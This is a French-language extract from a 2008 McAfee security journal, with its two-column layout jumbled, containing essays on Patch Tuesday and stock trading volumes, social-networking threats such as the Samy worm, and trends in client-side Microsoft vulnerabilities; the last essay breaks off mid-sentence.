Volume moyen pour l'indice ^IXIC le jour de


2 161 318 000 2 054 922 500 2 009 946 667 1 745 967 500 1 759 816 667
publication des correctifs mensuels (Patch Tuesday)
Volume moyen, pour l'indice ^IXIC un mardi
autre que Patch Tuesday 2 249 947 143 2 107 280 909 1 813 831 818 1 658 301 818 1 752 408 182

Ecart moyen en volume pour l'indice ^IXIC


entre Patch Tuesday et l'année complète) -3,91 % -1,66 % 4,31 % 0,82 % -0,55 %
Figure 6 : L'entrée en vigueur de
Ecart moyen en volume pour l'indice ^IXIC la publication mensuelle planifiée
-4,87 % -1,89 % 3,83 % 0,75 % -0,49 % des correctifs (Patch Tuesday)
(entre Patch Tuesday et les jours sans événements)
a apparemment convaincu
Différence pour l'action MSFT entre Patch -5,30 % -2,47 % -1,82 % -6,08 % -1,55 % les opérateurs boursiers qu'il
Tuesday et un autre mardi
n'existe pas d'avantage à
Différence pour l'indice ^IXIC entre Patch retirer des seuls événements de
-3,94 % -2,48 % 10,81 % 5,29 % 0,42 %
Tuesday et un autre mardi diffusion de correctifs.

AUTOMNE 2008 25
La figure 5 (page 25) montre que le jour de la publication d'un
bulletin de sécurité non planifié en 2003 et en 2002, le volume
Il se peut que certains utilisent déjà des
moyen des actions échangées dépassait le volume moyen de
l'année, respectivement de 7,6 % et de 2,46 % en moyenne. menaces de type « jour zéro » dans un
En les comparant uniquement aux jours sans événements but lucratif, non plus simplement en les
pour le volume moyen de l'année complète, ce chiffre atteint incorporant à des chevaux de Troie voleurs
respectivement 8,53 et 3 %. de mots de passe, mais pour prendre des
Ces chiffres contrastent nettement avec les écarts de volume positions de vente ou d'option sur les
constatés lors des publications de correctifs mensuels, plus marchés des actions et des produits dérivés.
prévisibles, comme l'illustre la figure 6 (page 25). Nous avons
également inclus une comparaison entre l'action Microsoft
(MSFT) et l'indice NASDAQ Composite (^IXIC).
Cela sous-entendrait que le passage d'une publication non
Communiqués de presse, réactions et implications
planifiée des bulletins (marche aléatoire) à une publication Les implications de cette analyse sont intéressantes et nous
préplanifiée (le deuxième mardi du mois) a entraîné une espérons que cet article contribuera à stimuler la réalisation de
diminution de l'intérêt des opérateurs en bourse pour les nouvelles études concernant l'influence des vulnérabilités et des
événements associés à Patch Tuesday. menaces sur les marchés des actions.
Examinons à présent les données de comparaison concernant Prenons l'exemple du canular Emulex7. Dans cette affaire, une
la publication des bulletins Microsoft Security Bulletin Advance personne a publié un faux communiqué de presse sur le départ
Notification (figure 7 ci-dessous). du président-directeur général de la société qui a entraîné ce
jour-là une chute de 62 % du cours de l'action Emulex. L'auteur
Pourquoi le volume moyen des transactions est-il plus faible le jour
du canular avait pris une position courte importante sur l'action
de cette notification avancée et le jour de publication des correctifs
et a réalisé un bénéfice de plus de 250 000 dollars. Il s'agissait
mensuels ? Selon notre hypothèse, la différence entre le volume
d'une fraude manifeste. De la même façon, les médias font
moyen de l'année et le volume moyen enregistré le jour des
périodiquement état de délits d'initiés (tout aussi illégaux).
correctifs mensuels peut s'expliquer en partie par des événements
d'importance majeure affectant la moyenne annuelle (en vertu de En revanche, si les fluctuations du cours de l'action sont liées à
la théorie des martingales) et qui, statistiquement, ont moins de des annonces de correctifs ou de vulnérabilités, que se passerait-il
chances de se produire le jour de la publication mensuelle compte si un investisseur prenait une position courte sur une importante
tenu de sa faible fréquence (douze fois par an)6. société d'édition de logiciels et publiait une série de vulnérabilités

Publication des bulletins Microsoft Security Bulletin Advance Notification

ECARTS DE VOLUME D’ACTIONS MSFT ECHANGEES (NOTIFICATION AVANCEE) 2008 2007 2006

Volume moyen, année complète 84 898 274 62 506 437 67 074 387

Volume moyen, année complète (jours sans événements) 86 738 696 64 210 868 68 753 419

Volume moyen, jour de notification avancée 82 848 700 61 532 042 54 484 850

Ecart moyen en volume -2,41 % -1,56 % -18,77 %

Ecart moyen en volume par rapport aux jours sans événements -4,48 % -4,17 % -20,75 %

Volume moyen pour l’indice ^IXIC, année complète 2 249 267 340 2 089 534 502 1 926 859 522
Figure 7 : En moyenne, le
volume d'échange des actions
Volume moyen pour l’indice ^IXIC, année complète (jours sans événements) 2 271 900 270 2 094 466 552 1 935 854 692 Microsoft est plus faible les jours
de notification avancée et de
Volume moyen pour l’indice ^IXIC lors d’une notification avancée 2 221 380 000 2 224 365 833 1 872 442 500
publication des correctifs mensuels.

26 McAFEE SECURITY JOURNAL


avec exploits sur la liste de diffusion Full Disclosure ? Nous Conclusion
pourrions peut-être assister à un événement semblable au mois
des bogues dans les navigateurs web, sauf que ce dernier serait Il reste encore beaucoup à faire pour déterminer l'impact des
dirigé un jour donné contre un seul éditeur. Si cela se passe vulnérabilités et des menaces sur les marchés des actions et
pendant les heures d'ouverture des marchés et un jour où le des produits dérivés. Cet article s'intéressait principalement aux
reste de l'actualité ne risque pas de distraire les investisseurs marchés des actions. Les marchés des produits dérivés opèrent
(par exemple un mardi ou un jeudi), la pression à la baisse de façon similaire, si ce n'est que leur volatilité est bien plus
sur l'action pourrait être importante au niveau du particulier. importante. S'ils éprouvent un certain niveau de confiance dans
L'opération serait incontestablement illégale si les vulnérabilités une tendance, il serait probablement logique de la part des
n'étaient pas réelles (on pourrait alors parler de diffamation ou opérateurs qui publient des vulnérabilités de faire coïncider la
de fraude). Qu'en est-il en revanche si elles étaient avérées ? La publication avec des dates d'expiration d'option.
manœuvre serait-elle illégale ? La divulgation d'informations
Je voudrais remercier mes collègues Craig Schmugar et Eugene
vraies, même dans un but de manipulation potentielle, n'est
Tsyrklevich pour leur relecture de l'article et des données
pas nécessairement considérée comme de l'ingénierie sociale, ni
présentées ainsi que pour leurs commentaires.—A.B.
même une pratique contraire à la loi.
Il est évidemment possible de remettre en cause la légalité de
l'action, mais pensez à la controverse Ford-Firestone relative aux
pneumatiques8. Si vous aviez conduit une Ford à cette époque, eu
des problèmes de pneus et décidé de prendre une position courte
Anthony Bettini fait partie de l'équipe de
sur l'action, votre transaction aurait-elle été légale ? Tout à fait. direction de McAfee Avert Labs. Il est spécialisé
Mais si vous aviez pris une position courte sur l'action puis averti dans la sécurité et la détection de vulnérabilités
Firstone, Ford et les autres, la transaction aurait-elle été légale ? des systèmes Windows. M. Bettini a présenté un
exposé lors de la conférence National Information
Comme pour tout vecteur d'attaque ou vulnérabilité, Systems Security du National Institute of Standards
l'information et la divulgation améliorent souvent la position and Technology à Washington sur les techniques
de sécurité des personnes en mesure de résoudre le problème. d'antitraçage ; il a donné des conférences dans
En parlant ouvertement des failles et des faiblesses, peut-être de nombreuses sociétés classées au Global 2000.
Lorsqu'il travaillait pour Foundstone, il publiait
pouvons-nous améliorer et surveiller plus efficacement le
les nouvelles vulnérabilités découvertes au sein
système. Il se peut que certains utilisent déjà des menaces de des applications Microsoft Windows, ISS Scanner,
type « jour zéro » dans un but lucratif, non plus simplement en PGP, Symantec ESM et autres. Il est également
les incorporant à des chevaux de Troie voleurs de mots de passe, le réviseur technique du livre Hacking Exposed,
mais pour prendre des positions de vente ou d'option sur les 5e édition (McGraw-Hill) — paru en français sous
le titre « Halte aux hackers ».
marchés des actions et des produits dérivés.
Il est clair que les spammeurs ont mis au point des techniques pour
tirer profit des marchés financiers : nous avons reçu un nombre
important de spam associé au marché des actions cotées en cents.

NOTES AUTRES RÉFÉRENCES


1 Goldsmith D. et Rauch J., Matasano Security, « Hacking Capitalism » t « CBOE's archive of historic VIX data, using newer algorithm for the pre-
(Le piratage du capitalisme), Black Hat USA 2007, 2 août 2007 September 22, 2003 algorithm switch » (Archives CBOE de données historiques
2 « FIX (Financial Information eXchange) », Wikipedia, 20 avril 2008 sur l'index VIX, utilisant l'algorithme le plus récent relativement au changement
http://en.wikipedia.org/wiki/Financial_Information_eXchange du 22/09/2003), 20 avril 2008 — http://www.cboe.com/micro/vix/historical.aspx
3 « Random walk hypothesis » (Marche aléatoire), Wikipedia, 15 mai 2008 — t Lo, A. W. « The Adaptive Markets Hypothesis: Market Efficiency from an
http://en.wikipedia.org/wiki/Random_walk_hypothesis Evolutionary Perspective » (Hypothèse des marchés adaptatifs : efficience des
4 « Efficient Market Hypothesis » (Efficience du marché), Wikipedia, 15 mai 2008 — marchés d'un point de vue évolutionnel), Journal of Portfolio Management.
http://en.wikipedia.org/wiki/Random_walk_hypothesis t La plupart des mesures financières ont été reproduites avec l'aimable
5 « Past performance not indicative of future results » (Les performances passées autorisation de Yahoo Finance. 15 mai 2008 — http://finance.yahoo.com
ne sont pas indicatives des résultats à l'avenir), CBOE, 22 mai 2008 — t D'autres mesures financières ont été reproduites avec l'aimable autorisation de
http://www.cboe.com/micro/vix/faq.aspx Google Finance. 20 avril 2008 — http://finance.google.com
6 « Martingale (probability theory) » (Théorie des martingales), Wikipedia, 22 mai
2008 — http://en.wikipedia.org/wiki/Martingale_%28probability_theory%29
7 « Emulex Hoax » (Les fausses infos sur Emulex), Wikipedia, 20 avril 2008 —
http://en.wikipedia.org/wiki/Emulex_hoax
8 « Firestone and Ford tire controversy » (Controverse entre Firestone et Ford),
Wikipedia, 20 avril 2008 —
http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy

AUTOMNE 2008 27
L'avenir des sites
de réseau social
Craig Schmugar

Ces dernières années, les sites de réseau social tels que MySpace, Facebook et bien
d'autres ont vu leur popularité croître à ce point qu'ils font désormais partie du paysage.
Dans l'esprit de la plupart des gens, il s'agit d'un phénomène relativement neuf

alors qu'en réalité, des sites tels que Classmates.com et SixDegrees. Lorsque le parc d'utilisateurs s'est fortement développé et que
com existent depuis plus de dix ans. Il n'en reste pas moins que le contenu proposé a évolué (notamment par l'ajout de jeux), le
ces sites n'ont connu un véritable essor qu'au cours des dernières système dorsal s'est trouvé incapable de faire face à la charge
années. Posons-nous d'abord la question de savoir ce qui caractérise supplémentaire. Les administrateurs du site ont été contraints
un site de réseau social. A la base, les sites de réseau social sont de limiter le contenu à bande passante élevée sans toutefois
des sites qui hébergent une communauté en ligne permettant aux remédier aux problèmes de performances, et les utilisateurs ont
utilisateurs de partager des informations, de nouer de nouveaux fini par se détourner du site. De plus, Friendster attendait de
contacts et de renouer avec d'anciennes connaissances. ses utilisateurs qu'ils se conforment à son modèle prédéterminé
d'utilisation du réseau et qu'ils correspondent à un certain profil.
Les sites de réseau social sont importants à deux égards. D'une
part, ils sont la parfaite illustration des sites du Web 2.0, dont le MySpace constituait une plate-forme plus robuste, tout d'abord en
réseau d'utilisateurs représente la plate-forme et la communauté termes de bande passante, mais aussi en raison de la grande liberté
détermine le contenu. La plate-forme se développe grâce aux accordée aux utilisateurs pour créer, modifier et consulter un contenu
contributions des utilisateurs qui utilisent, pour ce faire, les très diversifié. Lorsque le bruit a couru que MySpace était devenu le
applications mises à la disposition de la communauté. D'autre nouveau Friendster, il n'a pas fallu longtemps pour que la majorité
part, les sites de réseau social combinent divers canaux de des utilisateurs abandonnent ce dernier au profit du premier.
communication (e-mail, forums de messages, messagerie
instantanée et salles de chat) aux supports multimédias que sont De cette première bataille dans l'univers des réseaux sociaux, on
l'audio, la vidéo et l'impression. Au sein de ces communautés, peut tirer quelques enseignements : la souplesse de la plate-forme
des personnes ayant des centres d'intérêt similaires partagent est capitale, tout comme sa faculté de s'étendre et d'évoluer ou
informations, opinions et commentaires. De tels sites peuvent encore sa capacité à fidéliser les utilisateurs. Le respect de ces trois
servir de plates-formes de collaboration, ce qui permet aux grands principes prépare l'avenir des sites de réseau social.
réseaux de gagner en valeur à mesure que leur parc d'utilisateurs
prend de l'ampleur. En outre, ces plates-formes représentent
des canaux de médias extrêmement directs et ciblés. Dans une
Insécurité sociale
optique de marketing, les sociétés peuvent ainsi concentrer MySpace a pu supplanter Friendster en offrant notamment
leurs efforts sur les consommateurs réellement intéressés par aux utilisateurs des possibilités de personnalisation accrues.
leurs produits. Les sites de réseau social hébergent une mine Mais les auteurs d'attaques en ont profité pour insérer du code
d'informations qu'il est possible d'explorer et d'analyser dans malveillant et lancer des attaques par phishing très convaincantes
le but de compléter des profils d'utilisateur et de cartographier directement à partir de leur profil MySpace.
de façon précise les relations entre les utilisateurs d'une part, et Malheureusement, cette souplesse offerte aux utilisateurs crée un
entre les utilisateurs et leurs centres d'intérêt d'autre part. environnement idéal pour les exploits, dont les malfaiteurs usent
et abusent. Dans la course aux parts de marché et pour éviter une
La clé du succès d'un site de réseau social est un parc d'utilisateurs
débâcle similaire à celle de Friendster, de nombreux sites de réseau
bien développé et fidèle. Friendster.com en a fait la triste expérience.
social ont relégué la sécurité au second plan. Ils sont par conséquent
Précurseur de MySpace, Friendster a été, à son heure de gloire, le le théâtre de nombreuses nuisances : vers, attaques par phishing,
plus important site de réseau social. Cela n'a malheureusement vulnérabilités, collecte illicite d'informations, fuites de données,
pas duré. Le site a été, en quelque sorte, victime de son succès. distribution de publicités indésirables, diffamations et spam.

28 McAFEE SECURITY JOURNAL


Le point sur la situation actuelle
Deux ans et demi après l'apparition, le 4 octobre 2005, de Samy, Chaque fois que vous cliquez sur un
premier ver de réseau social diffusé à grande échelle, la plupart
lien, évaluez un blog ou conversez sur
des anciennes vulnérabilités de sécurité ont été corrigées. Le
problème n'a pas disparu pour autant. A moins que les failles de un sujet spécifique, le site peut recueillir
sécurité ne découragent les abonnés et diminuent leur nombre, des informations sur vous afin d'enrichir
les vulnérabilités resteront légion et les vulnérabilités associées aux
scripts intersites, à l'instar de celle exploitée par Samy, figurent
votre réseau social.
parmi les types de vulnérabilités les plus souvent signalées dans la
base de données CVE (Common Vulnerabilities and Exposures)1. Et
tout porte à croire que la situation n'est pas près de s'améliorer. Environ neuf mois après le lancement de la plate-forme
Facebook, MySpace lui a emboîté le pas et récemment, Google
En mai 2007, Facebook a lancé la plate-forme Facebook, qui a distribué une interface de programmation d'applications (API)
permettait à des développeurs tiers de créer et de commercialiser pour orkut, le site de réseau social de Google. Si ces plates-
des applications à l'intention des vingt millions d'utilisateurs actifs formes ont ouvert la voie à la prochaine génération de sites de
de Facebook. Un an et quelque 50 millions d'utilisateurs plus réseau social, elles ont également contribué à créer un autre
tard, plus de 20 000 applications Facebook ont été développées, vecteur d'exploits pour les auteurs d'attaques.
95 % des utilisateurs ayant exécuté au moins une application2.
Ces applications posent un risque supplémentaire dans la mesure
où les utilisateurs éprouvent un sentiment de sécurité illusoire en
L'avenir du réseau social
associant ces applications à un site en lequel ils ont confiance, en L'importance des sites de réseau social ne cessera de croître en
l'occurrence Facebook.com. raison du développement des plates-formes. Les applications phares
offriront la possibilité de se déplacer et de détecter la connexion et
En janvier 2008, Facebook a interdit l'application Secret Crush
l'emplacement géographique des utilisateurs dans le but de leur
après avoir découvert qu'elle avait conduit des utilisateurs à
offrir un plus grand confort de vie grâce à leur réseau virtuel : ils
installer le logiciel publicitaire Zango3. (Reportez-vous à la figure 1
voyageront toujours accompagnés de leur lien au réseau social.
pour d'autres exemples de menaces répandues.) Cet exemple
Il sera possible de savoir qui parmi ses amis est en ligne, et si
illustre parfaitement l'absence de contrôle de Facebook sur les
certains d'entre eux sont proches. La triangulation des tours de
applications publiées, ce qui ouvre la porte, potentiellement et
téléphonie mobile et les systèmes GPS permettront de transmettre
de facto, à de nombreuses menaces. Dans ce cas précis, il ne
votre emplacement aux personnes de votre choix. Des services de
s'agissait que d'un simple désagrément (publicitaire) mais qu'en
localisation géographique seront en mesure d'établir une liste des
sera-t-il la prochaine fois ?
entreprises et des lieux de loisir susceptibles de vous intéresser, en
fonction des informations et centres d'intérêt indiqués dans votre
profil. Les professionnels en déplacement pourront plus facilement
Profil des menaces associées aux réseaux sociaux retrouver des collaborateurs et des clients lors de conférences et
de foires commerciales. Les rencontres en ligne connaîtront de
nouvelles perspectives, grâce à la création de communautés fondées
MENACE TYPE SITE
sur l'emplacement géographique. De la sorte, il sera possible non
Grey Goo ver Second Life seulement de rencontrer une personne en ligne, mais aussi de
JS/QSpace ver MySpace converser avec l'âme sœur potentielle dans une même pièce.
JS/SpaceFlash ver MySpace Les sites sociaux seront également plus intelligents et pourront
recouper les informations relatives aux utilisateurs sur l'ensemble
JS/SpaceTalk extracteur d'informations MySpace
du Web. Un outil de navigation sociale tel que Digg sera associé
Kut Wormer ver orkut à des réseaux sociaux et optimisé grâce à une technologie
Fuites massives de photos personnelles fuite de données MySpace d'autoapprentissage comme Pandora ou StumbleUpon, et
une fonction de marquage comme Flickr. Il sera ainsi possible
PWS-Banker! 1d23 dérobeur de mots de passe orkut
d'obtenir un flux plus constant et optimisé de données
Samy ver MySpace pertinentes qui informera et éduquera la communauté de façon
Scrapkut ver orkut
bien plus efficace et ciblée qu'aujourd'hui.

Secret Crush programme indésirable FaceBook De votre iPhone, vous pourrez consulter les recommandations
des membres de votre réseau concernant les films à voir. Vous
Ver Xanga ver Xanga
pourrez lire les critiques que vos amis ont appréciées et afficher
les horaires des cinémas proches de chez vous, de même qu'il
Figure 1 : Les vers et autres menaces sévissent sur les sites de réseau social en raison vous sera possible de savoir où se trouvent vos amis et combien
de la trop grande confiance des utilisateurs envers les sites de leur communauté. de temps il leur faudra pour vous retrouver.

AUTOMNE 2008 29
Les sites seront en mesure d'identifier vos centres d'intérêts en doute permettre de concilier convivialité et sécurité. La relation de
fonction de votre comportement : les sites web visités, les articles confiance entre les sites et les utilisateurs revêt une importance
consultés, la musique que vous écoutez, les amis avec lesquels cruciale dans le succès des réseaux de demain. Toute violation de
vous conversez ainsi que leurs centres d'intérêt, par exemple. Ces cette confiance peut entraîner l'échec de toute une communauté.
données seront utilisées pour vous tenir au courant de l'actualité
L'utilisation croissante de profils ouverts et portables, d'applications
qui vous intéresse, tout en éliminant les informations inutiles
composites (applications web associant le contenu de
dont les utilisateurs sont aujourd'hui bombardés. Vous évoluerez
plusieurs sources en un seul outil) et d'API ouvertes faciliteront
dans un environnement web très personnalisé qui nécessitera
considérablement l'utilisation intersite, mais elles compliqueront
très peu d'intervention directe de votre part. Alors que les sites
singulièrement la tâche des administrateurs chargés d'assurer la
du Web 1.0 étaient déterminés par les administrateurs de site
protection contre les menaces ciblant ces vecteurs. Déjà difficiles
et ceux du Web 2.0 par le contenu généré par les utilisateurs,
à détecter aujourd'hui, les attaques multiniveaux le seront sans
l'avenir du réseau social réside dans les relations entre les
doute encore plus demain. Elles pourront émaner d'un site et
utilisateurs et les contenus, combiné au comportement des
se propager via un autre avant d'apparaître sur un réseau social
utilisateurs pour personnaliser le contenu.
touché. Le système de protection en place sur l'hôte devra identifier
Les premiers sites de réseau social de la troisième génération, ou les relations entre les sites afin de faire le tri entre les interactions
Social Networking 3.0, peuvent donner froid dans le dos tant la intersites valides et non valides et d'identifier les menaces.
précision de « l'intelligence artificielle » est impressionnante. Leur
Le problème d'atteinte à la vie privée soulevé dans cet article
profilage prend ici un tout autre sens, dans la mesure où le site
(collecte et corrélation d'informations, suivi de l'emplacement
peut en fait rassembler des utilisateurs présentant des affinités
géographique) ne peut manquer d'interpeller de nombreux
ou des centres d'intérêt similaires. D'un certain point de vue, les
utilisateurs. Il est clair que bon nombre d'entre eux choisiront
profils de compatibilité utilisés par certains services de rencontres en
de ne pas s'abonner à de tels services. Néanmoins, lorsqu'ils
ligne peuvent être considérés comme l'un des premiers exemples
réaliseront les avantages offerts en retour de quelques éléments
de la création de relations sociales par le profilage en ligne et la
d'information et qu'ils auront établi des relations de confiance,
mise en relation de personnes compatibles. Toutefois, dans les
la majorité n'hésitera plus à communiquer certains détails. Les
sites de réseau social de troisième génération, ce concept est
fournisseurs sont très conscients de cette situation et encouragent
considérablement élargi sans qu'il soit nécessaire de remplir un long
les utilisateurs à une adoption progressive des services, notamment
questionnaire. Chaque fois que vous cliquez sur un lien, évaluez un
en n'autorisant la communication de l'emplacement qu'au niveau
blog ou conversez sur un sujet spécifique, le site peut recueillir des
du département ou de la ville, par exemple. Malheureusement, les
informations sur vous afin d'enrichir votre réseau social.
cyberprédateurs ne sont jamais loin et les vulnérabilités de sécurité
Qui seront les grands bénéficiaires de cette corrélation croissante peuvent avoir de graves conséquences si de telles informations
d'informations ? Les utilisateurs constituent évidemment un venaient à tomber entre leurs mains.
facteur essentiel mais d'autres acteurs cherchent à tirer parti
Les sites de réseau social entrent dans une période faste : ils se
de cette situation. Les annonceurs se réjouissent d'avance de la
développent rapidement, leur nombre d'utilisateurs ne cesse
hausse anticipée des taux de conversion lorsque le marketing
d'augmenter et leurs fonctionnalités se multiplient. Leur valorisation
ciblera les utilisateurs en fonction de leurs centres d'intérêt
s'élève à plusieurs milliards de dollars. Les grands bouleversements
spécifiques. Les utilisateurs accorderont inévitablement une
qui nous attendent sont à la fois excitants et dangereux. A de
attention plus grande aux publicités et à leur contenu.
nombreux égards, l'avenir des sites de réseau social risque fort
d'être déterminant pour l'avenir d'Internet lui-même.
Un risque en hausse
Si les avantages offerts aux utilisateurs se multiplient, il en ira de
même pour les opportunités d'attaque. Les spammeurs et les
Spécialiste de la recherche des menaces, Craig
escrocs chercheront à exploiter cette mine d'or et, grâce à toutes
Schmugar a réalisé de nombreuses études et
ces données, pourront créer bien plus facilement des attaques
neutralisé d'importantes menaces pour le compte
d'ingénierie sociale convaincantes. Le niveau de détail et de
de McAfee Avert Labs depuis l'année 2000. Il
personnalisation des messages risque fort de tromper la vigilance
a découvert et classé des milliers de nouvelles
des utilisateurs. Les réseaux de robots sociaux auront également
menaces dont les vers Blaster, Mydoom, Mywife
l'opportunité de perturber sérieusement l'écosystème, en
et Sasser. Il reconnaît avoir développé au cours de
empoisonnant le réseau avec des messages racoleurs et des faux
cette période certaines tendances antisociales...
témoignages. Les administrateurs auront du pain sur la planche
puisqu'ils devront veiller à la qualité du contenu tout en déjouant
les manœuvres des criminels, et sans pour autant empêcher les
autres utilisateurs de profiter des multiples avantages du site.
La sécurité des futurs réseaux sociaux dépendra pour beaucoup NOTES
du système de défense mis en place au niveau des serveurs. 1 http://cwe.mitre.org/documents/vuln-trends/index.html
Les systèmes dorsaux devront analyser un volume considérable 2 http://www.facebook.com/press/info.php?statistics
de données entrantes et sortantes à la recherche de preuves 3 http://www.zdnet.com.au/news/security/soa/Spyware-claims-kill-off-Facebook-
de délits ou de la présence de code malveillant. Les services de s-Secret-Crush/0,130061744,339284896,00.htm?omnRef=http://www.google.
vérification de la réputation des sites et du contenu peuvent sans com/search?num=100

30 McAFEE SECURITY JOURNAL


Le nouveau souffle
des vulnérabilités
Rahul Kashyap

Bien que l'ingénierie sociale n'intervienne pas dans tous les types de
menaces pour la sécurité, McAfee Avert Labs a constaté une nouvelle
tendance de plus en plus répandue : des auteurs de logiciels malveillants
utiliseraient l'ingénierie sociale pour exploiter des vulnérabilités logicielles.
La plupart des vers Internet les plus virulents du début de la des vers de réseau qui, à cette époque, causaient d'importants
décennie exploitaient généralement des vulnérabilités présentes dommages aux produits Windows. Les effets du Service Pack 2
dans des applications Microsoft. Ces vers bien connus que pour XP sont devenus beaucoup plus évidents quelques années
sont Sasser, Blaster, Code Red ou SQL Slammer avaient tous un plus tard, lorsqu'un grand nombre d'utilisateurs sont passés à
point commun. (Notons au passage que Sasser et Blaster furent cette nouvelle version du système d'exploitation.
découvert par Avert Labs, au même titre que d'autres logiciels
malveillants de premier plan.) Ces vers exploitaient tous des Malheureusement, les auteurs de logiciels malveillants n'étaient
vulnérabilités de serveurs. Ils avaient pour objectif la destruction pas en reste. Ils se détournèrent en effet rapidement des
des serveurs par le biais d'une propagation automatique après serveurs pour s'attaquer aux clients, mettant à jour de nouvelles
exploitation des failles. Bien que de nombreux produits de vulnérabilités dans Microsoft Office, Microsoft Internet Explorer
fournisseurs différents aient connu des brèches de sécurité et dans de nombreux formats de fichiers propriétaires. Ces
semblables, nous nous attarderons ici principalement sur les attaques contre les clients furent marquées par l'apparition d'un
vulnérabilités et tendances relatives aux produits Microsoft. Cela nombre important de fuzzers4 (dont le rôle est de repérer les
ne signifie aucunement que Microsoft soit particulièrement brèches de sécurité en bombardant une application avec des
vulnérable, mais nous considérons simplement que la popularité données aléatoires), de bugs liés à l'analyse syntaxique dans un
des produits de cette marque auprès des particuliers et des langage de script et de vulnérabilités de contrôles ActiveX. Des
entreprises en fait une cible privilégiée des auteurs de logiciels projets du type « Month of Browser Bugs5 » (Mois des bugs des
malveillants et des voleurs de données. navigateurs), axfuzz6, COMRaider ou encore hamachi7 ont permis
d'éveiller l'intérêt dans ce domaine et de révéler les innombrables
D'après Avert Labs, les vulnérabilités de serveurs pouvant être vulnérabilités touchant les logiciels clients. La recherche de bugs
exploitées par des vers ont diminué en nombre ces dernières et l'exploitation d'applications clientes connurent à cette époque
années, grâce à une utilisation plus fréquente de mesures de
sécurité permettant de protéger les appels de procédure à Patchs de correction des vulnérabilités exploitables à distance Microsoft
14
distance. La figure 1 ci-contre répertorie toutes les vulnérabilités
exploitables par appels de procédure à distance Microsoft 12
Windows sur une période de dix ans, jusqu'au premier 10
trimestre 2008. Comme vous pouvez le constater, leur nombre
8
a été réduit de manière significative ces deux dernières années.
Cette tendance se manifeste également lorsqu'on isole ce type 6
de vulnérabilités pour les autres plates-formes serveur Microsoft 4
populaires, comme IIS Web Server ou SQL Server.
2
Microsoft a par ailleurs renforcé la protection de ses produits 0
en publiant le Service Pack 2 pour Windows XP. Parmi d'autres 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008
mécanismes de protection, le Service Pack 2 incluait des outils de
prévention d'exécution des données2 qui, même s'ils n'étaient Figure 1 : Microsoft a largement renforcé la sécurité des appels de procédure à
pas infaillibles3, ont toutefois contribué à limiter la propagation distance depuis 2006. (Source : Microsoft1)

AUTOMNE 2008 31
Patchs de correction des vulnérabilités d'Office
45 Attaques ciblées
40 La clé des vulnérabilités touchant les systèmes clients est que
35
pour pouvoir être exploitées, l'intervention de l'utilisateur est
nécessaire. Les auteurs de logiciels malveillants ont par conséquent
30 dû trouver des idées novatrices pour tromper les utilisateurs et les
25 inciter à cliquer sur des liens spécifiques ou à télécharger certains
documents ou images depuis Internet. L'une des avancées les plus
20
importantes en matière d'exploitation de systèmes clients a été
15 l'évolution rapide du spam fondé sur l'ingénierie sociale.
10 L'exploitation de vulnérabilités de systèmes clients et l'ingénierie
5 sociale vont de pair. Le lien entre ces deux facteurs est plus
qu'évident et la menace est récemment devenue plus complexe.
0
1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 Cette complexité repose en partie sur les attaques ciblées
d'ingénierie sociale, lesquelles représentent une nouvelle
Figure 2 : Le nombre de vulnérabilités de Microsoft Office a augmenté en 2006 et est tendance dans le paysage actuel des menaces. Ces attaques
resté élevé les deux années suivantes. (Source : Microsoft) ciblées visent plus particulièrement les structures relevant de
l'armée ou de la défense nationale12. Depuis la vague des
leur apogée, et cette tendance se poursuit au moment même vulnérabilités Office en 2006, de nombreux rapports ont
où nous écrivons cet article. Le nombre de logiciels touchés est indiqué que certaines administrations recevaient des messages
difficile à déterminer. Certaines sources prétendent toutefois électroniques contenant des fichiers malveillants au format
qu'ils se compteraient en plusieurs centaines de millions8. Word, PowerPoint ou Access. Il semble donc que l'association
entre ingénierie sociale et exploitation des vulnérabilités soit
La figure 2 illustre clairement la croissance soudaine du nombre désormais utilisée à des fins bien précises : l'espionnage.
de vulnérabilités affectant Microsoft Office. Elles ont connu leur
point culminant en 2006 et continuent depuis à donner du fil à L'espionnage est, par essence, bien plus difficile à détecter et à
retordre aux équipes de Microsoft. contrecarrer que les attaques motivées par le simple appât du
gain. Il n'est pas rare que les vulnérabilités découvertes dans
La grande majorité de ces vulnérabilités concernait Office 2000. ces documents malveillants soient des attaques de type « jour
Cette version est en effet très répandue, et par conséquent plus zéro » : ces fichiers de données échappent donc encore plus
largement exploitée. Dans le modèle économique des auteurs de facilement à la vigilance, d'autant que les vulnérabilités qu'ils
logiciels malveillants, les vulnérabilités d'Office 2000 représentent recèlent ne sont souvent identifiées que lorsque le mal est fait.
un meilleur retour sur investissement. Cela est principalement Dans la mesure où ces attaques « jour zéro » ciblaient l'armée
dû au fait que cette suite logicielle souffre depuis longtemps ou l'administration, on peut émettre l'hypothèse qu'elles
d'une défaillance majeure en termes de sécurité : les utilisateurs ont pu être financées par des agents ou des Etats étrangers.
d'Office 2000 doivent en effet se rendre sur le site web Techniques d'ingénierie sociale taillées sur mesure, vulnérabilités
« Office Update » pour télécharger des patchs9, et la procédure « jour zéro », argent, pouvoir : on se croirait presque dans un
automatique en ligne n'inclut pas les mises à jour spécifiques roman d'espionnage de John le Carré. Certains analystes en
à Office 2000 et Office 97. Cette négligence représente une sécurité considèrent toutefois que la réalité a rejoint la fiction.
véritable aubaine pour les auteurs de logiciels malveillants qui De nombreux experts ont par ailleurs prédit que c'est dans
peuvent ainsi profiter du fait que de nombreux utilisateurs le cyberespace qu'éclateront les prochaines guerres. Tous ces
n'effectueront pas de mise à jour régulière de leur suite Office10. événements ne sont peut-être après tout que des coups d'essai,
Le nombre d'ordinateurs transformés en « zombies » (et donc dans la perspective d'une cyberguerre à venir ?
contrôlés par des pirates) en raison d'une telle brèche de sécurité
pourrait s'élever à plusieurs dizaines de milliers.
Piratage web furtif
Bien que cet article se concentre avant tout sur les vulnérabilités Un domaine où les exploitations ont également évolué ces
propres aux produits Microsoft, cette tendance affecte également dernières années est celui du piratage des serveurs web.
d'autres fournisseurs de logiciels clients populaires, comme Auparavant, les auteurs d'attaques dégradaient les sites web
Adobe, Mozilla, Apple et bien d'autres encore. Le « mois des bugs après les avoir piratés, laissant généralement leur marque sur le
Apple » (Month of Apple Bugs) a mis en évidence de nombreux site dans l'espoir de devenir célèbres. Ces pratiques ne sont plus,
problèmes rencontrés par les clients ; de plus, on a enregistré une en tout cas pour ce qui est des pirates de la nouvelle génération,
augmentation fulgurante du nombre de vulnérabilités découvertes plus sophistiqués. Dans un contexte où les vulnérabilités de
